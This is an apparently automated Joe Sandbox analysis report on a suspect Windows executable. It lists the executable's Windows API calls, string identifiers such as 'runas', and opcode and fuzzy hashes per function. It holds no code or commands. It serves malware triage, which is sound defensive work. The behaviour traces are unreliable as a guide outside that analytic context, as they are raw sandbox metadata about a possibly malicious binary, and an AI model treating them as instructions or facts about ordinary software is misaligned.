                • Instruction ID: 29639433522ac6328cf0e2a28fea143001246cb757df3893288074d6a1d62abf
                • Opcode Fuzzy Hash: 6fe0a8ae9a3c8a6d124c95f17b10df8f27f2b68032be4f32e414403cfad0b77a
                • Instruction Fuzzy Hash: A0B1F271D003099BDB24DF64C845BAEBBB4BF15300F00466FE62697792DB35AA09DBA1
                APIs
                  • Part of subcall function 00CBA470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,79C85444,00000000,?), ref: 00CBA4BA
                • GetFileAttributesA.KERNEL32(?,?,00000000,00000000,00D17494,0000000E,79C85444,00000000,00000000), ref: 00CCAC7D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: AttributesFileFolderPath
                • String ID: .$1F==$246122658369$32bj$3Yy=
                • API String ID: 1512852658-2807037979
                • Opcode ID: 227e18f1ce49be9fff000453ee094101dd41820c652b861cd4ef811d8965ba27
                • Instruction ID: 74735a7aeaae4846fcd44bf021623919fa6f4c1f1af3eb788313b07241795fec
                • Opcode Fuzzy Hash: 227e18f1ce49be9fff000453ee094101dd41820c652b861cd4ef811d8965ba27
                • Instruction Fuzzy Hash: FFE1BF7090428CDFEF14DFA8C949BDDBFB6AB05304F608189D41967382C7755A89DBA2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID:
                • String ID: list too long
                • API String ID: 0-1124181908
                • Opcode ID: d93f442f0062046d0ca75204e9cac3b8089d845c535a7354a96ddd0ff8f50bf0
                • Instruction ID: 0c65cfc103739af2c1d8ae4b21ed87558f9ca60a2256be4a4cad73e64d4ffd2b
                • Opcode Fuzzy Hash: d93f442f0062046d0ca75204e9cac3b8089d845c535a7354a96ddd0ff8f50bf0
                • Instruction Fuzzy Hash: B951B1B4D04719ABDB10DF64CC45B9AF7B4FB04710F0082AAE91CA7381DB70AA85DF96
                APIs
                • _ValidateLocalCookies.LIBCMT ref: 00CDC677
                • ___except_validate_context_record.LIBVCRUNTIME ref: 00CDC67F
                • _ValidateLocalCookies.LIBCMT ref: 00CDC708
                • __IsNonwritableInCurrentImage.LIBCMT ref: 00CDC733
                • _ValidateLocalCookies.LIBCMT ref: 00CDC788
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                • String ID: csm
                • API String ID: 1170836740-1018135373
                • Opcode ID: f1d891b34c2ca7c384e2beeddcb6ff310c1e4d571b67ef084ab4d0b10681b427
                • Instruction ID: 6485bb67d1845ce6c97b1b3063fd94cebb0778267ae8da0e81d35d432f84a4b3
                • Opcode Fuzzy Hash: f1d891b34c2ca7c384e2beeddcb6ff310c1e4d571b67ef084ab4d0b10681b427
                • Instruction Fuzzy Hash: B841B434E0020AABCF10DF68C8C4AAEBBB5EF44314F148057EA159B392D731DA06DF90
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID:
                • String ID: api-ms-$ext-ms-
                • API String ID: 0-537541572
                • Opcode ID: 3f27f24a81ddf60ecdaead8a6bea4929bba874a4736b996c2c5a289de7c4e072
                • Instruction ID: 46307c88b28bd7399f0b81376a582797eb9049d161489fe35074154fa7775d6b
                • Opcode Fuzzy Hash: 3f27f24a81ddf60ecdaead8a6bea4929bba874a4736b996c2c5a289de7c4e072
                • Instruction Fuzzy Hash: 1521E771A06391ABEF218B779C45B5A77589B057A0F150221ED2EE72E1DF30DE0896F0
                APIs
                  • Part of subcall function 00CF0F82: _free.LIBCMT ref: 00CF0FA7
                • _free.LIBCMT ref: 00CF1284
                  • Part of subcall function 00CE8006: HeapFree.KERNEL32(00000000,00000000,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?), ref: 00CE801C
                  • Part of subcall function 00CE8006: GetLastError.KERNEL32(?,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?,?), ref: 00CE802E
                • _free.LIBCMT ref: 00CF128F
                • _free.LIBCMT ref: 00CF129A
                • _free.LIBCMT ref: 00CF12EE
                • _free.LIBCMT ref: 00CF12F9
                • _free.LIBCMT ref: 00CF1304
                • _free.LIBCMT ref: 00CF130F
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
                • Instruction ID: 5c2fcd4d44fc8b367265177cebbe93ebbbebd4f8e81e72d9876f8a44e3500d77
                • Opcode Fuzzy Hash: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
                • Instruction Fuzzy Hash: B4115E71941B08AAD6B0BBB1CC07FDBB7DDAF04B40F404C15B3AEA6053DB65B609A752
                APIs
                • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00CE7607
                • __fassign.LIBCMT ref: 00CE77EC
                • __fassign.LIBCMT ref: 00CE7809
                • WriteFile.KERNEL32(?,8B18EC83,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CE7851
                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00CE7891
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CE7939
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                • String ID:
                • API String ID: 1735259414-0
                • Opcode ID: c9ee402a856c9957ad25b8a635298a65912cc5affcce4003fa3641f088cae194
                • Instruction ID: 6b2fa41761091c4b639ea5c46479c603a0bb11b82428e0ea4216ea1f189c4b01
                • Opcode Fuzzy Hash: c9ee402a856c9957ad25b8a635298a65912cc5affcce4003fa3641f088cae194
                • Instruction Fuzzy Hash: 6BC1B175D042989FCB15CFA9C8949EDBBB5FF08314F28426AE855FB342D6319E02CB60
                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00CD966F
                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00CD96DA
                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CD96F7
                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00CD9736
                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CD9795
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00CD97B8
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ByteCharMultiStringWide
                • String ID:
                • API String ID: 2829165498-0
                • Opcode ID: 9b0f77bd0735e5d8efe7989b05db82aeff56345254a0e0b6011d1f5508a947ec
                • Instruction ID: 43d012991c8ce3f56bf0bb815c21a6449b721ffc8656db2f6d6c9ab6cec227f2
                • Opcode Fuzzy Hash: 9b0f77bd0735e5d8efe7989b05db82aeff56345254a0e0b6011d1f5508a947ec
                • Instruction Fuzzy Hash: D751B17A610206BBEF209F61DC85FAB7BA9EF44750F16402AFA14D63A0D730CE10DB60
                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 00CD4605
                • std::_Lockit::_Lockit.LIBCPMT ref: 00CD4627
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CD4647
                • __Getctype.LIBCPMT ref: 00CD46DD
                • std::_Facet_Register.LIBCPMT ref: 00CD46FC
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CD4714
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                • String ID:
                • API String ID: 1102183713-0
                • Opcode ID: 4724c011e99abbcc8a543613e857be9d6551fc1c459061226e69122dcf95f308
                • Instruction ID: 661c6afab1b24c8c5c2b589c110b70a891b36388f3f85ac937932db02b5aa4db
                • Opcode Fuzzy Hash: 4724c011e99abbcc8a543613e857be9d6551fc1c459061226e69122dcf95f308
                • Instruction Fuzzy Hash: 6B419E719002149FCB29DF54D841AAEB7B4EF55B10F11815AEA0AAB391DF30EE46CBA0
                APIs
                • Sleep.KERNEL32(00000064,79C85444,?,00000000,00CF8F3D,000000FF), ref: 00CB8A1C
                • __Init_thread_footer.LIBCMT ref: 00CB8AB6
                  • Part of subcall function 00CD98E8: EnterCriticalSection.KERNEL32(00D18FA8,75920F00,?,00CB8ABB,00D1CDC0,00CFFF40), ref: 00CD98F2
                  • Part of subcall function 00CD98E8: LeaveCriticalSection.KERNEL32(00D18FA8,?,00CB8ABB,00D1CDC0,00CFFF40), ref: 00CD9925
                  • Part of subcall function 00CD98E8: WakeAllConditionVariable.KERNEL32(?,00D1CDC0,00CFFF40), ref: 00CD999C
                • CreateThread.KERNEL32(00000000,00000000,00CB8880,00D1C578,00000000,00000000), ref: 00CB8B1B
                • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CB8B26
                  • Part of subcall function 00CD9932: EnterCriticalSection.KERNEL32(00D18FA8,00000000,75920F00,?,00CB8A41,00D1CDC0), ref: 00CD993D
                  • Part of subcall function 00CD9932: LeaveCriticalSection.KERNEL32(00D18FA8,?,00CB8A41,00D1CDC0), ref: 00CD997A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: CriticalSection$EnterLeaveSleep$ConditionCreateInit_thread_footerThreadVariableWake
                • String ID: runas
                • API String ID: 4065365256-4000483414
                • Opcode ID: 9bc0742cb977f2845d6be9d64f2d6cc8fc6b15bce15c087b1a0837b15f0b2e17
                • Instruction ID: c6fe0de8267406c2a4279bf63fc8c779d476c781e589702cedd82220aa3e3037
                • Opcode Fuzzy Hash: 9bc0742cb977f2845d6be9d64f2d6cc8fc6b15bce15c087b1a0837b15f0b2e17
                • Instruction Fuzzy Hash: FAB12571610208AFEB08DF68DC86BDD7B6AEB45704F50821EF5149B3C1CB75A985CBA1
                APIs
                • GetLastError.KERNEL32(?,00CFBC1D,00CDC7FB,00CDAE94,00CD7BA9,79C85444,?,?,?,00000000,00CFC7D7,000000FF,?,00CB2576,?,?), ref: 00CDC812
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CDC820
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CDC839
                • SetLastError.KERNEL32(00000000,?,00000000,00CFC7D7,000000FF,?,00CB2576,?,?,0000000F,00CB3BA5,00000000,0000000F,00000000,00CFC170,000000FF), ref: 00CDC88B
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: 0f56b2d42dd2bd5718d6c204432bf7f6877ffa88f0b9d85960d1e7a944c395fd
                • Instruction ID: 508842d5798b0ee5f9ba5cc517f7855675696c0ab6d9442f0c702cdb71509736
                • Opcode Fuzzy Hash: 0f56b2d42dd2bd5718d6c204432bf7f6877ffa88f0b9d85960d1e7a944c395fd
                • Instruction Fuzzy Hash: 2F01B1365093137EA72526767CC69A72694EF02B76730022BF721C13E2EF528C42F260
                Strings
                • C:\Users\user\Desktop\6uHfmjGMfL.exe, xrefs: 00CEF49C
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID:
                • String ID: C:\Users\user\Desktop\6uHfmjGMfL.exe
                • API String ID: 0-3138345258
                • Opcode ID: 66d582bad22f0c9bdeea444c1a64c29b29bed3e30065c4ba79bb166b5b881133
                • Instruction ID: b120f57899571d0f5b9a254ee5a6eebcce6806fafc0aa16f4dc501c56398c6f2
                • Opcode Fuzzy Hash: 66d582bad22f0c9bdeea444c1a64c29b29bed3e30065c4ba79bb166b5b881133
                • Instruction Fuzzy Hash: 82210871200285BFEB21AFBB8C41D6B776DEF203647108638F929C7191E731EE5197A0
                APIs
                • FreeLibrary.KERNEL32(00000000,?,?,00CDD918,?,?,00000000,?,?,00CDD9CA,00000002,FlsGetValue,00D033D8,00D033E0,?), ref: 00CDD8E7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: FreeLibrary
                • String ID: api-ms-
                • API String ID: 3664257935-2084034818
                • Opcode ID: 4a805a0c4561ae72c46d161547a78fd89506f889844709d015d7282676380ff4
                • Instruction ID: 40b66121c515b6869e74e0459fe1d5bb5cfceea1fdac6b1beb45d8ccb27f034f
                • Opcode Fuzzy Hash: 4a805a0c4561ae72c46d161547a78fd89506f889844709d015d7282676380ff4
                • Instruction Fuzzy Hash: 48118235E41321ABDF235B79DC45B5A7398AF01770F150222EA66EB3C0D770EE04AAE5
                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00CDDCE7,?,?,00CDDCAF,00000000,00000000,?), ref: 00CDDD07
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CDDD1A
                • FreeLibrary.KERNEL32(00000000,?,?,00CDDCE7,?,?,00CDDCAF,00000000,00000000,?), ref: 00CDDD3D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: d3cb376d5ca9d4a049a10a7015645cd51aa20ae28a2cc8cb34d2db69bd4cb0c6
                • Instruction ID: 81552e81cd0b08877fcacecbf3300b5f8edda0bc267e3827f5d881cdcf38b36c
                • Opcode Fuzzy Hash: d3cb376d5ca9d4a049a10a7015645cd51aa20ae28a2cc8cb34d2db69bd4cb0c6
                • Instruction Fuzzy Hash: C2F08C34A40318FBDF119B50ED0AB9D7AA9EF00756F100061F509E12A0CB708F04DAB0
                APIs
                  • Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
                  • Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3
                • _free.LIBCMT ref: 00CE5AAB
                • _free.LIBCMT ref: 00CE5AC4
                • _free.LIBCMT ref: 00CE5B02
                • _free.LIBCMT ref: 00CE5B0B
                • _free.LIBCMT ref: 00CE5B17
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: _free$ErrorLast
                • String ID:
                • API String ID: 3291180501-0
                • Opcode ID: f26026e1509a924ef44de8d0f89b8bd24f78d3ba811ce3f37c97a3c20b83945c
                • Instruction ID: 42adc3fb798fc6b6d71b5db392150519805747e1d6268ec644f77128bcd71814
                • Opcode Fuzzy Hash: f26026e1509a924ef44de8d0f89b8bd24f78d3ba811ce3f37c97a3c20b83945c
                • Instruction Fuzzy Hash: C7B17B75901659DFDB24DF19C884AADB3B5FF08318F5046AAE819A7390E730AE90DF40
                APIs
                  • Part of subcall function 00CE8235: HeapAlloc.KERNEL32(00000000,00CD0B87,?,?,00CD9C1F,00CD0B87,?,00CD321E,8B18EC84,75920F00), ref: 00CE8267
                • _free.LIBCMT ref: 00CE5444
                • _free.LIBCMT ref: 00CE545B
                • _free.LIBCMT ref: 00CE5478
                • _free.LIBCMT ref: 00CE5493
                • _free.LIBCMT ref: 00CE54AA
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: _free$AllocHeap
                • String ID:
                • API String ID: 1835388192-0
                • Opcode ID: dbbb8703fee1710c877d743b17f9df276a075a4b3f2c39054a02c6938e31e9d9
                • Instruction ID: fbcec2d85b3168057683fc67fe6639c7389b7bb2d85405e979a1a0e442412dfc
                • Opcode Fuzzy Hash: dbbb8703fee1710c877d743b17f9df276a075a4b3f2c39054a02c6938e31e9d9
                • Instruction Fuzzy Hash: CF512472A00B04AFDB21DF6ACC41B6AB7F5FF48725F140569E919DB290E730EA40DB50
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
                • String ID:
                • API String ID: 3354401312-0
                • Opcode ID: 9b90e4e7a8feedd0052a9822de50060d85a0b4ef2e927fea84d5196af9774a66
                • Instruction ID: 2fda5058cb2a747df3bcf3771b51b71b19c5b6bab06ede651373865844d118ff
                • Opcode Fuzzy Hash: 9b90e4e7a8feedd0052a9822de50060d85a0b4ef2e927fea84d5196af9774a66
                • Instruction Fuzzy Hash: 4E616F70901209DFDB14DFA4C954BAEBBB4BF04304F14429AE919A7782DB35AA09DFA1
                APIs
                • CoInitialize.OLE32(00000000), ref: 00CBF547
                • CoCreateInstance.OLE32(00D0DFDC,00000000,00000001,00D0E03C,?), ref: 00CBF563
                • CoUninitialize.OLE32 ref: 00CBF571
                • CoUninitialize.OLE32 ref: 00CBF630
                • CoUninitialize.OLE32 ref: 00CBF644
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
